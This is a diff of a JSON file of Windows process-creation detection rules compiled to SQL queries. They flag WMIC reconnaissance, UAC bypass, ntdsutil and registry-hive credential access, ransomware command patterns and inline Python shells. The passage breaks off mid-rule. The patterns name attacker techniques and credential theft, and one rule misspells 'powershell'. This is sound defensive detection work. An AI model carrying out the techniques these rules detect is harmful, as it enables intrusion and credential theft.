"f91ed517-a6ba-471d-9910-b3b4a398c0f3", "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. 
This could be a sign of a rogue \".appx\" package installation/execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Suspicious RunAs-Like Flag Combination", - "id": 
"50d66fb0-03f8-4da0-8add-84e77d12a020", + "title": "Computer System Reconnaissance Via Wmic.EXE", + "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", "status": "experimental", - "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation" + "attack.discovery", + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" + "filename": "proc_creation_win_wmic_recon_computersystem.yml" }, { - "title": 
"Potential Product Class Reconnaissance Via Wmic.EXE", - "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", + "status": "test", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1059", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_product_class.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Password Protected Compressed File Extraction Via 7Zip", - "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", + "title": "Service StartupType Change Via PowerShell Set-Service", + "id": "62b20d44-1546-4e61-afce-8e175eb9473c", "status": "experimental", - "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", + "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or 
\"manual\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate activity is expected since extracting files with a password can be common in some environement." + "False positives may occur with troubleshooting scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_7zip_password_extraction.yml" + "filename": "proc_creation_win_powershell_set_service_disabled.yml" }, { - "title": "Monitoring Winget For LOLbin Execution", - "id": "313d6012-51a0-4d93-8dfc-de8553239e25", - "status": "experimental", - "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them without touching disk. The manifest option enables you to install an application by passing in a YAML file directly to the client. 
Winget can be used to download and install exe's, msi, msix files later.", - "author": "Sreeman, Florian Roth (Nextron Systems), Frack113", + "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "blueteamer8699", "tags": [ - "attack.defense_evasion", + "attack.discovery", "attack.execution", - "attack.t1059" + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND CommandLine LIKE '%install%' ESCAPE '\\' AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_execution_via_winget.yml" + "filename": "proc_creation_win_lolbin_gather_network_info.yml" }, { - "title": "Enumeration for Credentials in Registry", - "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", "status": "test", - "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the 
system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", - "author": "frack113", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.002" + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + }, + { + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", + "status": "test", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ "Unknown" ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + }, + { + "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "status": "test", + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + 
"author": "Thomas Patzke", + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "falsepositives": [ + "NTDS maintenance" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" + "filename": "proc_creation_win_ntdsutil_usage.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", - "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "status": "test", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE 
'%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine 
LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Pubprn.vbs Proxy Execution", - "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", - "status": "experimental", - "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", - "author": "frack113", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1204" + ], + "falsepositives": [ + "Unknown", + "UAC bypass method used by other malware" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_malware_darkside_ransomware.yml" + }, + { + "title": "Abusing Print Executable", + "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", + "status": "test", + "description": "Attackers 
can use print.exe for remote file copy", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1216.001" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pubprn.yml" + "filename": "proc_creation_win_print_remote_file_copy.yml" }, { - "title": "Add New Windows Capability - ProcCreation", - "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", + "title": "Python Inline Command Execution", + "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", + "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. Filter accordingly" + "Python libraries that use a flag starting with \"-c\". 
Filter according to your environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'python.exe' OR (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_add_windows_capability.yml" + "filename": "proc_creation_win_python_inline_command_execution.yml" }, { - "title": "Stop Windows Service Via Sc.EXE", - "id": "81bcb81b-5b1f-474b-b373-52c871aaa7b1", + "title": "PUA - Crassus Execution", + "id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", "status": "experimental", - "description": "Detects the stopping of a Windows service", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. 
Filter legitimate activity accordingly" + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\') AND NOT ((CommandLine IN ('sc stop KSCWebConsoleMessageQueue', 'sc stop LGHUBUpdaterService') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_stop_service.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", + "status": "experimental", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND 
CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "title": "Rundll32 With Suspicious Parent Process", + "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", "status": "experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. 
Variant of Raspberry Robin, as first reported by Red Canary.", + "author": "CD_ROM_", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.g0069" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_rundll32_parent_explorer.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "Potential CVE-2022-29072 Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. 
This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "cve.2022.29072" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 